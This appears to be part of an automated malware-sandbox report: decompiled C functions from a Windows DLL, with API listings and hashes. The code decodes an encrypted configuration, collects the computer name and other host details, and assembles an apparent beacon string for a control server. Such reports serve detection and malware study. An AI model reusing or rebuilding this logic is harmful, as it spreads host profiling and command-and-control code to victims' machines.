                                                          				_t76 = E04473AB0(_v8, _a8, _a12, _a20,  &_a20,  &_a12);
                                                          				if(_t76 >= 0) {
                                                          					_t61 = _a28;
                                                          					if(_t61 != 0 &&  *_t61 != 0) {
                                                          						_t52 = _v8;
                                                          						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                          					}
                                                          					if(_t76 >= 0) {
                                                          						_t43 =  *_t55;
                                                          						_t68 =  *0x447d2a8; // 0xb9a5a8
                                                          						_t20 = _t68 + 0x447e1fc; // 0x740053
                                                          						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                          						if(_t76 >= 0) {
                                                          							_t76 = E044757B4(_a4);
                                                          							if(_t76 >= 0) {
                                                          								_t65 = _a28;
                                                          								if(_t65 != 0 &&  *_t65 == 0) {
                                                          									_t50 = _a4;
                                                          									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                          								}
                                                          							}
                                                          						}
                                                          						_t45 = _a4;
                                                          						if(_t45 != 0) {
                                                          							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                          						}
                                                          						_t57 = __imp__#6;
                                                          						if(_a20 != 0) {
                                                          							 *_t57(_a20);
                                                          						}
                                                          						if(_a12 != 0) {
                                                          							 *_t57(_a12);
                                                          						}
                                                          					}
                                                          				}
                                                          				_t41 = _v8;
                                                          				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                          				goto L18;
                                                          			}





















                                                          APIs
                                                            • Part of subcall function 04473AB0: SysAllocString.OLEAUT32(80000002), ref: 04473B0D
                                                            • Part of subcall function 04473AB0: SysFreeString.OLEAUT32(00000000), ref: 04473B73
                                                          • SysFreeString.OLEAUT32(?), ref: 0447227A
                                                          • SysFreeString.OLEAUT32(044785ED), ref: 04472284
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 986138563-0
                                                          • Opcode ID: 3b9b82c98663d24a7d067ea39d9824aab4c66ceecf229add14bd172c36075781
                                                          • Instruction ID: d6880ea2081496a8c806854f5c293357ecdc18a4113db090ec7a6dfd0607473f
                                                          • Opcode Fuzzy Hash: 3b9b82c98663d24a7d067ea39d9824aab4c66ceecf229add14bd172c36075781
                                                          • Instruction Fuzzy Hash: 03317C71500109AFCF21EF95C888CEBBB7AFFC97407104A99F9159B211D271ED52CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(0447A513), ref: 04476220
                                                            • Part of subcall function 0447219B: SysFreeString.OLEAUT32(?), ref: 0447227A
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04476261
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          Similarity
                                                          • API ID: String$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 986138563-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E044758DB(void* __ecx) {
                                                          				signed int _v8;
                                                          				void* _t15;
                                                          				void* _t19;
                                                          				void* _t20;
                                                          				void* _t22;
                                                          				intOrPtr* _t23;
                                                          
                                                          				_t23 = __imp__;
                                                          				_t20 = 0;
                                                          				_v8 = _v8 & 0;
                                                          				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                          				_t10 = _v8;
                                                          				if(_v8 != 0) {
                                                          					_t20 = E0447A71F(_t10 + 1);
                                                          					if(_t20 != 0) {
                                                          						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                          						if(_t15 != 0) {
                                                          							 *((char*)(_v8 + _t20)) = 0;
                                                          						} else {
                                                          							E0447A734(_t20);
                                                          							_t20 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t20;
                                                          			}










                                                          APIs
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,04471FA0,74B5F710,00000000,?,?,04471FA0), ref: 044758F3
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,04471FA0,04471FA1,?,?,04471FA0), ref: 04475910
                                                            • Part of subcall function 0447A734: HeapFree.KERNEL32(00000000,00000000,04475637,00000000,?,?,00000000), ref: 0447A740
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          Similarity
                                                          • API ID: ComputerHeapName$AllocateFree
                                                          • String ID:
                                                          • API String ID: 187446995-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                          				intOrPtr _t4;
                                                          				void* _t10;
                                                          				void* _t11;
                                                          				void* _t12;
                                                          				void* _t14;
                                                          
                                                          				_t14 = 1;
                                                          				_t4 = _a8;
                                                          				if(_t4 == 0) {
                                                          					if(InterlockedDecrement(0x447d23c) == 0) {
                                                          						E04471B42();
                                                          					}
                                                          				} else {
                                                          					if(_t4 == 1 && InterlockedIncrement(0x447d23c) == 1) {
                                                          						_t10 = E044712E5(_t11, _t12, _a4); // executed
                                                          						if(_t10 != 0) {
                                                          							_t14 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t14;
                                                          			}









                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(0447D23C), ref: 04474EDF
                                                            • Part of subcall function 044712E5: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04474EF2,?), ref: 044712F8
                                                          • InterlockedDecrement.KERNEL32(0447D23C), ref: 04474EFF
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          Similarity
                                                          • API ID: Interlocked$CreateDecrementHeapIncrement
                                                          • String ID:
                                                          • API String ID: 3834848776-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E04471AE2(intOrPtr* __edi) {
                                                          				intOrPtr _v8;
                                                          				char _v12;
                                                          				intOrPtr _v16;
                                                          				intOrPtr _t15;
                                                          				intOrPtr* _t21;
                                                          
                                                          				_t21 = __edi;
                                                          				_push( &_v12);
                                                          				_push(__edi);
                                                          				_v8 = 0x1d4c0;
                                                          				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                                          				while(1) {
                                                          					_v16 = _t15;
                                                          					Sleep(0x1f4); // executed
                                                          					if(_v12 == 4) {
                                                          						break;
                                                          					}
                                                          					if(_v8 == 0) {
                                                          						L4:
                                                          						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                                          						continue;
                                                          					} else {
                                                          						if(_v8 <= 0x1f4) {
                                                          							_v16 = 0x80004004;
                                                          						} else {
                                                          							_v8 = _v8 - 0x1f4;
                                                          							goto L4;
                                                          						}
                                                          					}
                                                          					L8:
                                                          					return _v16;
                                                          				}
                                                          				goto L8;
                                                          			}









                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 04471B2A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04475D7D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20) {
                                                          				void* _t17;
                                                          
                                                          				if(_a4 == 0) {
                                                          					L2:
                                                          					return E04476002(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
                                                          				}
                                                          				_t17 = E04476207(_a4, _a8, _a12, _a16, _a20); // executed
                                                          				if(_t17 != 0) {
                                                          					goto L2;
                                                          				}
                                                          				return _t17;
                                                          			}





                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,04478708,3D0447C0,80000002,04473741,0447A513,74666F53,4D4C4B48,0447A513,?,3D0447C0,80000002,04473741,?), ref: 04475DA2
                                                            • Part of subcall function 04476207: SysAllocString.OLEAUT32(0447A513), ref: 04476220
                                                            • Part of subcall function 04476207: SysFreeString.OLEAUT32(00000000), ref: 04476261
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          Similarity
                                                          • API ID: String$AllocFreelstrlen
                                                          • String ID:
                                                          • API String ID: 3808004451-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          C-Code - Quality: 95%
                                                          			E0447888E(int* __ecx) {
                                                          				int _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				void* __esi;
                                                          				signed int _t26;
                                                          				signed int _t31;
                                                          				signed int _t37;
                                                          				char* _t43;
                                                          				char* _t44;
                                                          				char* _t45;
                                                          				char* _t46;
                                                          				char* _t47;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t50;
                                                          				intOrPtr _t51;
                                                          				void* _t53;
                                                          				intOrPtr _t54;
                                                          				intOrPtr _t55;
                                                          				signed int _t58;
                                                          				intOrPtr _t61;
                                                          				signed int _t62;
                                                          				signed int _t67;
                                                          				void* _t69;
                                                          				void* _t70;
                                                          				signed int _t72;
                                                          				signed int _t76;
                                                          				signed int _t80;
                                                          				signed int _t84;
                                                          				signed int _t88;
                                                          				signed int _t92;
                                                          				void* _t97;
                                                          				intOrPtr _t114;
                                                          
                                                          				_t98 = __ecx;
                                                          				_t26 =  *0x447d2a4; // 0x63699bc3
                                                          				if(E04477145( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x90) {
                                                          					 *0x447d2d8 = _v8;
                                                          				}
                                                          				_t31 =  *0x447d2a4; // 0x63699bc3
                                                          				if(E04477145( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
                                                          					_v12 = 2;
                                                          					L62:
                                                          					return _v12;
                                                          				}
                                                          				_t37 =  *0x447d2a4; // 0x63699bc3
                                                          				if(E04477145( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
                                                          					L60:
                                                          					HeapFree( *0x447d238, 0, _v16);
                                                          					goto L62;
                                                          				} else {
                                                          					_t97 = _v12;
                                                          					if(_t97 == 0) {
                                                          						_t43 = 0;
                                                          					} else {
                                                          						_t92 =  *0x447d2a4; // 0x63699bc3
                                                          						_t43 = E04476B2E(_t98, _t97, _t92 ^ 0x724e87bc);
                                                          					}
                                                          					if(_t43 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
                                                          							 *0x447d240 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t44 = 0;
                                                          					} else {
                                                          						_t88 =  *0x447d2a4; // 0x63699bc3
                                                          						_t44 = E04476B2E(_t98, _t97, _t88 ^ 0x2b40cc40);
                                                          					}
                                                          					if(_t44 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
                                                          							 *0x447d244 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t45 = 0;
                                                          					} else {
                                                          						_t84 =  *0x447d2a4; // 0x63699bc3
                                                          						_t45 = E04476B2E(_t98, _t97, _t84 ^ 0x3b27c2e6);
                                                          					}
                                                          					if(_t45 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                                          							 *0x447d248 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t46 = 0;
                                                          					} else {
                                                          						_t80 =  *0x447d2a4; // 0x63699bc3
                                                          						_t46 = E04476B2E(_t98, _t97, _t80 ^ 0x0602e249);
                                                          					}
                                                          					if(_t46 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                                          							 *0x447d004 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t47 = 0;
                                                          					} else {
                                                          						_t76 =  *0x447d2a4; // 0x63699bc3
                                                          						_t47 = E04476B2E(_t98, _t97, _t76 ^ 0x3603764c);
                                                          					}
                                                          					if(_t47 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                                          							 *0x447d02c = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t48 = 0;
                                                          					} else {
                                                          						_t72 =  *0x447d2a4; // 0x63699bc3
                                                          						_t48 = E04476B2E(_t98, _t97, _t72 ^ 0x2cc1f2fd);
                                                          					}
                                                          					if(_t48 != 0) {
                                                          						_push(_t48);
                                                          						_t69 = 0x10;
                                                          						_t70 = E044756FA(_t69);
                                                          						if(_t70 != 0) {
                                                          							_push(_t70);
                                                          							E04476702();
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t49 = 0;
                                                          					} else {
                                                          						_t67 =  *0x447d2a4; // 0x63699bc3
                                                          						_t49 = E04476B2E(_t98, _t97, _t67 ^ 0xb30fc035);
                                                          					}
                                                          					if(_t49 != 0 && E044756FA(0, _t49) != 0) {
                                                          						_t114 =  *0x447d32c; // 0x50195b0
                                                          						E044723F4(_t114 + 4, _t65);
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t50 = 0;
                                                          					} else {
                                                          						_t62 =  *0x447d2a4; // 0x63699bc3
                                                          						_t50 = E04476B2E(_t98, _t97, _t62 ^ 0x372ab5b7);
                                                          					}
                                                          					if(_t50 == 0) {
                                                          						L52:
                                                          						_t51 =  *0x447d2a8; // 0xb9a5a8
                                                          						_t20 = _t51 + 0x447e252; // 0x616d692f
                                                          						 *0x447d2d4 = _t20;
                                                          						goto L53;
                                                          					} else {
                                                          						_t61 = E044756FA(0, _t50);
                                                          						 *0x447d2d4 = _t61;
                                                          						if(_t61 != 0) {
                                                          							L53:
                                                          							if(_t97 == 0) {
                                                          								_t53 = 0;
                                                          							} else {
                                                          								_t58 =  *0x447d2a4; // 0x63699bc3
                                                          								_t53 = E04476B2E(_t98, _t97, _t58 ^ 0xd8dc5cde);
                                                          							}
                                                          							if(_t53 == 0) {
                                                          								_t54 =  *0x447d2a8; // 0xb9a5a8
                                                          								_t21 = _t54 + 0x447e791; // 0x6976612e
                                                          								_t55 = _t21;
                                                          							} else {
                                                          								_t55 = E044756FA(0, _t53);
                                                          							}
                                                          							 *0x447d340 = _t55;
                                                          							HeapFree( *0x447d238, 0, _t97);
                                                          							_v12 = 0;
                                                          							goto L60;
                                                          						}
                                                          						goto L52;
                                                          					}
                                                          				}
                                                          			}





































                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04475D25,?,63699BC3,?,04475D25,63699BC3,?,04475D25,63699BC3,00000005,0447D00C,00000008), ref: 04478933
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04475D25,?,63699BC3,?,04475D25,63699BC3,?,04475D25,63699BC3,00000005,0447D00C,00000008), ref: 04478965
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04475D25,?,63699BC3,?,04475D25,63699BC3,?,04475D25,63699BC3,00000005,0447D00C,00000008), ref: 04478997
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04475D25,?,63699BC3,?,04475D25,63699BC3,?,04475D25,63699BC3,00000005,0447D00C,00000008), ref: 044789C9
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04475D25,?,63699BC3,?,04475D25,63699BC3,?,04475D25,63699BC3,00000005,0447D00C,00000008), ref: 044789FB
                                                          • HeapFree.KERNEL32(00000000,04475D25,04475D25,?,63699BC3,?,04475D25,63699BC3,?,04475D25,63699BC3,00000005,0447D00C,00000008,?,04475D25), ref: 04478AF2
                                                          • HeapFree.KERNEL32(00000000,?,04475D25,?,63699BC3,?,04475D25,63699BC3,?,04475D25,63699BC3,00000005,0447D00C,00000008,?,04475D25), ref: 04478B05
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: b4270b6d60b26fd1aa03c352b100fca401c3531b76170047b356e58bd198a1ed
                                                          • Instruction ID: 3566ef1d35b956420e0c793acae5d1db984ce0246df6674f833a133d448ff492
                                                          • Opcode Fuzzy Hash: b4270b6d60b26fd1aa03c352b100fca401c3531b76170047b356e58bd198a1ed
                                                          • Instruction Fuzzy Hash: 26714DB1E10115AFEF20FBB999889DBB7EDEF883407240927A506D7205EA34F9478761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 66%
                                                          			E04471F13(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                                          				intOrPtr _v0;
                                                          				intOrPtr _v4;
                                                          				intOrPtr _v16;
                                                          				intOrPtr _v24;
                                                          				intOrPtr _v28;
                                                          				void* _v44;
                                                          				intOrPtr _v52;
                                                          				void* __edi;
                                                          				long _t25;
                                                          				intOrPtr _t26;
                                                          				intOrPtr _t27;
                                                          				intOrPtr _t28;
                                                          				intOrPtr _t29;
                                                          				intOrPtr _t30;
                                                          				void* _t33;
                                                          				intOrPtr _t34;
                                                          				int _t37;
                                                          				intOrPtr _t42;
                                                          				intOrPtr _t43;
                                                          				intOrPtr _t50;
                                                          				intOrPtr _t54;
                                                          				intOrPtr* _t56;
                                                          				intOrPtr _t62;
                                                          				intOrPtr _t68;
                                                          				intOrPtr _t71;
                                                          				intOrPtr _t74;
                                                          				int _t77;
                                                          				intOrPtr _t78;
                                                          				int _t81;
                                                          				intOrPtr _t83;
                                                          				int _t86;
                                                          				intOrPtr* _t89;
                                                          				intOrPtr* _t90;
                                                          				void* _t91;
                                                          				void* _t95;
                                                          				void* _t96;
                                                          				void* _t97;
                                                          				intOrPtr _t98;
                                                          				void* _t100;
                                                          				int _t101;
                                                          				void* _t102;
                                                          				void* _t103;
                                                          				void* _t105;
                                                          				void* _t106;
                                                          				void* _t108;
                                                          
                                                          				_t95 = __edx;
                                                          				_t91 = __ecx;
                                                          				_t25 = __eax;
                                                          				_t105 = _a16;
                                                          				_v4 = 8;
                                                          				if(__eax == 0) {
                                                          					_t25 = GetTickCount();
                                                          				}
                                                          				_t26 =  *0x447d018; // 0xf1c1aee9
                                                          				asm("bswap eax");
                                                          				_t27 =  *0x447d014; // 0x3a87c8cd
                                                          				asm("bswap eax");
                                                          				_t28 =  *0x447d010; // 0xd8d2f808
                                                          				asm("bswap eax");
                                                          				_t29 = E0447D00C; // 0xeec43f25
                                                          				asm("bswap eax");
                                                          				_t30 =  *0x447d2a8; // 0xb9a5a8
                                                          				_t3 = _t30 + 0x447e633; // 0x74666f73
                                                          				_t101 = wsprintfA(_t105, _t3, 2, 0x3d15e, _t29, _t28, _t27, _t26,  *0x447d02c,  *0x447d004, _t25);
                                                          				_t33 = E044756CD();
                                                          				_t34 =  *0x447d2a8; // 0xb9a5a8
                                                          				_t4 = _t34 + 0x447e673; // 0x74707526
                                                          				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                          				_t108 = _t106 + 0x38;
                                                          				_t102 = _t101 + _t37;
                                                          				_t96 = E044758DB(_t91);
                                                          				if(_t96 != 0) {
                                                          					_t83 =  *0x447d2a8; // 0xb9a5a8
                                                          					_t6 = _t83 + 0x447e8d4; // 0x736e6426
                                                          					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t86;
                                                          					HeapFree( *0x447d238, 0, _t96);
                                                          				}
                                                          				_t97 = E0447A199();
                                                          				if(_t97 != 0) {
                                                          					_t78 =  *0x447d2a8; // 0xb9a5a8
                                                          					_t8 = _t78 + 0x447e8dc; // 0x6f687726
                                                          					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t81;
                                                          					HeapFree( *0x447d238, 0, _t97);
                                                          				}
                                                          				_t98 =  *0x447d32c; // 0x50195b0
                                                          				_a32 = E04474622(0x447d00a, _t98 + 4);
                                                          				_t42 =  *0x447d2d0; // 0x0
                                                          				if(_t42 != 0) {
                                                          					_t74 =  *0x447d2a8; // 0xb9a5a8
                                                          					_t11 = _t74 + 0x447e8b6; // 0x3d736f26
                                                          					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t77;
                                                          				}
                                                          				_t43 =  *0x447d2cc; // 0x0
                                                          				if(_t43 != 0) {
                                                          					_t71 =  *0x447d2a8; // 0xb9a5a8
                                                          					_t13 = _t71 + 0x447e88d; // 0x3d706926
                                                          					wsprintfA(_t102 + _t105, _t13, _t43);
                                                          				}
                                                          				if(_a32 != 0) {
                                                          					_t100 = RtlAllocateHeap( *0x447d238, 0, 0x800);
                                                          					if(_t100 != 0) {
                                                          						E0447518F(GetTickCount());
                                                          						_t50 =  *0x447d32c; // 0x50195b0
                                                          						__imp__(_t50 + 0x40);
                                                          						asm("lock xadd [eax], ecx");
                                                          						_t54 =  *0x447d32c; // 0x50195b0
                                                          						__imp__(_t54 + 0x40);
                                                          						_t56 =  *0x447d32c; // 0x50195b0
                                                          						_t103 = E04471BB6(1, _t95, _t105,  *_t56);
                                                          						asm("lock xadd [eax], ecx");
                                                          						if(_t103 != 0) {
                                                          							StrTrimA(_t103, 0x447c28c);
                                                          							_push(_t103);
                                                          							_t62 = E0447361A();
                                                          							_v16 = _t62;
                                                          							if(_t62 != 0) {
                                                          								_t89 = __imp__;
                                                          								 *_t89(_t103, _v0);
                                                          								 *_t89(_t100, _a4);
                                                          								_t90 = __imp__;
                                                          								 *_t90(_t100, _v28);
                                                          								 *_t90(_t100, _t103);
                                                          								_t68 = E04476777(0xffffffffffffffff, _t100, _v28, _v24);
                                                          								_v52 = _t68;
                                                          								if(_t68 != 0 && _t68 != 0x10d2) {
                                                          									E04476761();
                                                          								}
                                                          								HeapFree( *0x447d238, 0, _v44);
                                                          							}
                                                          							HeapFree( *0x447d238, 0, _t103);
                                                          						}
                                                          						HeapFree( *0x447d238, 0, _t100);
                                                          					}
                                                          					HeapFree( *0x447d238, 0, _a24);
                                                          				}
                                                          				HeapFree( *0x447d238, 0, _t105);
                                                          				return _a12;
                                                          			}

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04471F2A
                                                          • wsprintfA.USER32 ref: 04471F77
                                                          • wsprintfA.USER32 ref: 04471F94
                                                          • wsprintfA.USER32 ref: 04471FB7
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04471FC7
                                                          • wsprintfA.USER32 ref: 04471FE9
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04471FF9
                                                          • wsprintfA.USER32 ref: 04472030
                                                          • wsprintfA.USER32 ref: 04472050
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0447206D
                                                          • GetTickCount.KERNEL32 ref: 0447207D
                                                          • RtlEnterCriticalSection.NTDLL(05019570), ref: 04472091
                                                          • RtlLeaveCriticalSection.NTDLL(05019570), ref: 044720AF
                                                            • Part of subcall function 04471BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,044720C2,?,050195B0), ref: 04471BE1
                                                            • Part of subcall function 04471BB6: lstrlen.KERNEL32(?,?,?,044720C2,?,050195B0), ref: 04471BE9
                                                            • Part of subcall function 04471BB6: strcpy.NTDLL ref: 04471C00
                                                            • Part of subcall function 04471BB6: lstrcat.KERNEL32(00000000,?), ref: 04471C0B
                                                            • Part of subcall function 04471BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,044720C2,?,050195B0), ref: 04471C28
                                                          • StrTrimA.SHLWAPI(00000000,0447C28C,?,050195B0), ref: 044720E1
                                                            • Part of subcall function 0447361A: lstrlen.KERNEL32(05019A78,00000000,00000000,7742C740,044720ED,00000000), ref: 0447362A
                                                            • Part of subcall function 0447361A: lstrlen.KERNEL32(?), ref: 04473632
                                                            • Part of subcall function 0447361A: lstrcpy.KERNEL32(00000000,05019A78), ref: 04473646
                                                            • Part of subcall function 0447361A: lstrcat.KERNEL32(00000000,?), ref: 04473651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04472100
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04472107
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04472114
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04472118
                                                            • Part of subcall function 04476777: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 04476829
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04472148
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04472157
                                                          • HeapFree.KERNEL32(00000000,00000000,?,050195B0), ref: 04472166
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04472178
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04472187
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                          • String ID:
                                                          • API String ID: 3080378247-0
                                                          • Opcode ID: c3c1734406eb5185c926163fb1b3d71634bd02685951c04dfcead930ae7347f5
                                                          • Instruction ID: 29eb7f8d9076990cfea3832236cc2e86ef4149a6bd9c9cc98853258ef4678bbd
                                                          • Opcode Fuzzy Hash: c3c1734406eb5185c926163fb1b3d71634bd02685951c04dfcead930ae7347f5
                                                          • Instruction Fuzzy Hash: 8B617BB1900240AFFB219FA4EC88E9AB7E9EF48354F040515FA08D7261DB39EC079B65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 27%
                                                          			E04476C38(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				long _v16;
                                                          				intOrPtr _v20;
                                                          				signed int _v24;
                                                          				void* __esi;
                                                          				long _t43;
                                                          				intOrPtr _t44;
                                                          				intOrPtr _t46;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t50;
                                                          				intOrPtr _t54;
                                                          				intOrPtr _t57;
                                                          				void* _t58;
                                                          				void* _t59;
                                                          				void* _t60;
                                                          				intOrPtr _t66;
                                                          				void* _t71;
                                                          				void* _t74;
                                                          				intOrPtr _t75;
                                                          				void* _t77;
                                                          				intOrPtr _t79;
                                                          				intOrPtr* _t80;
                                                          				intOrPtr _t91;
                                                          
                                                          				_t79 =  *0x447d33c; // 0x5019798
                                                          				_v24 = 8;
                                                          				_t43 = GetTickCount();
                                                          				_push(5);
                                                          				_t74 = 0xa;
                                                          				_v16 = _t43;
                                                          				_t44 = E0447A557(_t74,  &_v16);
                                                          				_v8 = _t44;
                                                          				if(_t44 == 0) {
                                                          					_v8 = 0x447c18c;
                                                          				}
                                                          				_t46 = E044718A5(_t79);
                                                          				_v12 = _t46;
                                                          				if(_t46 != 0) {
                                                          					_t80 = __imp__;
                                                          					_t48 =  *_t80(_v8, _t71);
                                                          					_t49 =  *_t80(_v12);
                                                          					_t50 =  *_t80(_a4);
                                                          					_t54 = E0447A71F(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                          					_v20 = _t54;
                                                          					if(_t54 != 0) {
                                                          						_t75 =  *0x447d2a8; // 0xb9a5a8
                                                          						_t16 = _t75 + 0x447eb08; // 0x530025
                                                          						 *0x447d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                          						_push(4);
                                                          						_t77 = 5;
                                                          						_t57 = E0447A557(_t77,  &_v16);
                                                          						_v8 = _t57;
                                                          						if(_t57 == 0) {
                                                          							_v8 = 0x447c190;
                                                          						}
                                                          						_t58 =  *_t80(_v8);
                                                          						_t59 =  *_t80(_v12);
